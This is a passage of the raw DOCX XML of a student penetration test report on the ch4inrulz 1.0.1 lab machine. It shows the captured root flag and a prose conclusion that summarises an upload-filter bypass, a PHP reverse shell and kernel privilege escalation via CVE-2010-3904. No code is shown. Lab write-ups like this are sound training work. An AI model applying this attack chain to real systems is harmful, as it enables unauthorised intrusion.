    <w:p w14:paraId="4B0658AB" w14:textId="6E6487A1" w:rsidR="00D51DD0" w:rsidRDefault="00D51DD0" w:rsidP="000F6EAB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="8579"/>
        </w:tabs>
        <w:spacing w:after="140" w:line="269" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Running the file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B41CA2" w14:textId="2D80F027" w:rsidR="00D51DD0" w:rsidRDefault="00D51DD0" w:rsidP="000F6EAB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="8579"/>
        </w:tabs>
        <w:spacing w:before="120" w:after="160"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D51DD0">
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="39EF8339" wp14:editId="348A0224">
            <wp:extent cx="4105848" cy="914528"/>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105848" cy="914528"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4689D02D" w14:textId="65384A8C" w:rsidR="00D51DD0" w:rsidRDefault="00D51DD0" w:rsidP="000F6EAB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="8579"/>
        </w:tabs>
        <w:spacing w:before="120" w:after="160"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D51DD0">
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="35755745" wp14:editId="71A1BF64">
            <wp:extent cx="3467584" cy="962159"/>
            <wp:effectExtent l="0" t="0" r="0"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467584" cy="962159"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B90DA5D" w14:textId="23AFB6C9" w:rsidR="00D51DD0" w:rsidRDefault="00D51DD0" w:rsidP="000F6EAB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="8579"/>
        </w:tabs>
        <w:spacing w:after="140" w:line="269" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">The root flag : </w:t>
      </w:r>
      <w:r w:rsidRPr="00D51DD0">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>8f420533b79076cc99e9f95a1a4e5568</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27040F5E" w14:textId="61CE5486" w:rsidR="00D51DD0" w:rsidRDefault="00D51DD0" w:rsidP="000F6EAB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="8579"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:t>4  Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="438D8E8B" w14:textId="5C2405D8" w:rsidR="00D51DD0" w:rsidRDefault="00D51DD0" w:rsidP="00D51DD0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="8579"/>
        </w:tabs>
        <w:spacing w:after="140" w:line="269" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D51DD0">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Conclusion</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D012807" w14:textId="07A6FB7E" w:rsidR="00D51DD0" w:rsidRDefault="00D51DD0" w:rsidP="00D51DD0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="8579"/>
        </w:tabs>
        <w:spacing w:after="140" w:line="269" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">In conclusion, the ch4inrulz 1.0.1 machine demonstrated a realistic chain of vulnerabilities that required methodical enumeration, exploitation, and privilege escalation to achieve full system compromise. Initial reconnaissance revealed two web services running on ports 80 and 8011, leading to the discovery of a file read API and a password-protected development directory. Through further enumeration, a cracked MD5 hash exposed valid credentials, granting access to a file upload functionality. By bypassing the upload filter using a double extension and GIF magic byte header, a PHP reverse shell was successfully uploaded and executed via the vulnerable API endpoint, establishing an initial foothold as the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>www-data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> user. From there, the kernel version was identified as Linux 2.6.35-19, an outdated and unpatched build vulnerable to CVE-2010-3904, a local privilege escalation flaw in the RDS protocol. Exploiting this vulnerability elevated privileges to root, completing the full compromise of the target. This exercise highlighted the critical importance of keeping systems patched and up to date, restricting unnecessary network services, implementing robust file upload validation, and securing sensitive credentials — all of which contributed to the successful exploitation of this machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C0ABC75" w14:textId="32ECAA5F" w:rsidR="00D51DD0" w:rsidRDefault="00D51DD0" w:rsidP="00D51DD0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="8579"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C50DE7F" w14:textId="05747BC4" w:rsidR="00D51DD0" w:rsidRDefault="00D51DD0" w:rsidP="00D51DD0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="8579"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BB4F974" w14:textId="77777777" w:rsidR="00CD72F8" w:rsidRPr="00B15D17" w:rsidRDefault="00CD72F8" w:rsidP="000F6EAB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="8579"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00CD72F8" w:rsidRPr="00B15D17">
      <w:footerReference w:type="default" r:id="rId49"/>
      <w:pgSz w:w="12240" w:h="15840"/>
      <w:pgMar w:top="1080" w:right="1152" w:bottom="1008" w:left="1152"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eXGyreAdventor">
    <w:panose1 w:val="00000500000000000000"/>
    <w:charset w:val="00"/>
    <w:family w:val="modern"/>
    <w:notTrueType/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="20000087" w:usb1="00000000"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 xml:space="preserve">CH4IN4RULZ V1 Penetration Test Report  |  Page </w:t>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="begin"/>
      <w:instrText xml:space="preserve"> PAGE </w:instrText>
      <w:fldChar w:fldCharType="separate"/>
      <w:t>1</w:t>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proofState w:spelling="clean"/>
  <w:defaultTabStop w:val="72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A87198"/>
    <w:rsid w:val="000046CF"/>
    <w:rsid w:val="000F6EAB"/>
    <w:rsid w:val="00135D26"/>
    <w:rsid w:val="001D3CBC"/>
    <w:rsid w:val="00272801"/>
    <w:rsid w:val="002847BB"/>
    <w:rsid w:val="00287B4D"/>
    <w:rsid w:val="002D78BE"/>
    <w:rsid w:val="002E3A55"/>
    <w:rsid w:val="003307C7"/>
    <w:rsid w:val="0034780F"/>
    <w:rsid w:val="00391E3B"/>
    <w:rsid w:val="003E1AF5"/>
    <w:rsid w:val="003F3E10"/>
    <w:rsid w:val="0048628C"/>
    <w:rsid w:val="004F66E0"/>
    <w:rsid w:val="005F3C6D"/>
    <w:rsid w:val="006373F6"/>
    <w:rsid w:val="00685BEB"/>
    <w:rsid w:val="00717A4C"/>
    <w:rsid w:val="00757D6B"/>
    <w:rsid w:val="00817148"/>
    <w:rsid w:val="0087134C"/>
    <w:rsid w:val="00872278"/>
    <w:rsid w:val="008B6610"/>
    <w:rsid w:val="00921AB5"/>
    <w:rsid w:val="0092240B"/>
    <w:rsid w:val="0095344B"/>
    <w:rsid w:val="009E60E8"/>
    <w:rsid w:val="00A87198"/>
    <w:rsid w:val="00AF278B"/>
    <w:rsid w:val="00B023E6"/>
    <w:rsid w:val="00B10F0B"/>
    <w:rsid w:val="00B15D17"/>
    <w:rsid w:val="00B444B3"/>
    <w:rsid w:val="00BD5F3A"/>
    <w:rsid w:val="00C133D6"/>
    <w:rsid w:val="00C55C9B"/>
    <w:rsid w:val="00CA0EF7"/>
    <w:rsid w:val="00CD72F8"/>
    <w:rsid w:val="00D40812"/>
    <w:rsid w:val="00D51DD0"/>
    <w:rsid w:val="00D56D58"/>
    <w:rsid w:val="00EE1C84"/>
    <w:rsid w:val="00EF745F"/>
    <w:rsid w:val="00F01D0B"/>
    <w:rsid w:val="00F30AFA"/>
    <w:rsid w:val="00FF54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5A47E49A"/>
  <w15:docId w15:val="{4FE19998-1DD2-41FE-9E6F-AEE572EBA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0" w:line="269" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>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57D6B"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00757D6B"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="HTMLCode">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D51DD0"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:pPr>
      <w:keepNext/>
      <w:spacing w:before="360" w:after="160"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Aptos Display" w:hAnsi="Aptos Display"/>
      <w:b/>
      <w:color w:val="1F4E79"/>
      <w:sz w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:pPr>
      <w:keepNext/>
      <w:spacing w:before="260" w:after="100"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Aptos Display" w:hAnsi="Aptos Display"/>
      <w:b/>
      <w:color w:val="1F4E79"/>
      <w:sz w:val="25"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:pPr>
      <w:keepNext/>
      <w:spacing w:before="200" w:after="80"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Aptos Display" w:hAnsi="Aptos Display"/>
      <w:b/>
      <w:color w:val="1F4E79"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="CodeBlock">
    <w:name w:val="Code Block"/>
    <w:pPr>
      <w:spacing w:before="60" w:after="120"/>
      <w:ind w:left="288"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:sz w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:pPr>
      <w:spacing w:after="280"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Aptos Display" w:hAnsi="Aptos Display"/>
      <w:b/>
      <w:color w:val="1F4E79"/>
      <w:sz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yperlink" Target="http://192.168.1.106" TargetMode="External"/><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fontTable" Target="fontTable.xml"/><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7.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theme" Target="theme/theme1.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.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4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372</TotalTime>
  <Pages>21</Pages>
  <Words>1047</Words>
  <Characters>5971</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CH4IN4RULZ V1 Penetration Test Report</dc:title>
  <dc:subject>CEH Diploma Final Project</dc:subject>
  <dc:creator>Abu Afnan</dc:creator>
  <cp:keywords/>
  <dc:description>Professionally formatted while retaining supplied technical evidence.</dc:description>
  <cp:lastModifiedBy>Abu Afnan</cp:lastModifiedBy>
  <cp:revision>16</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-09-09T16:39:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-09-10T21:37:00Z</dcterms:modified>
</cp:coreProperties>
</file>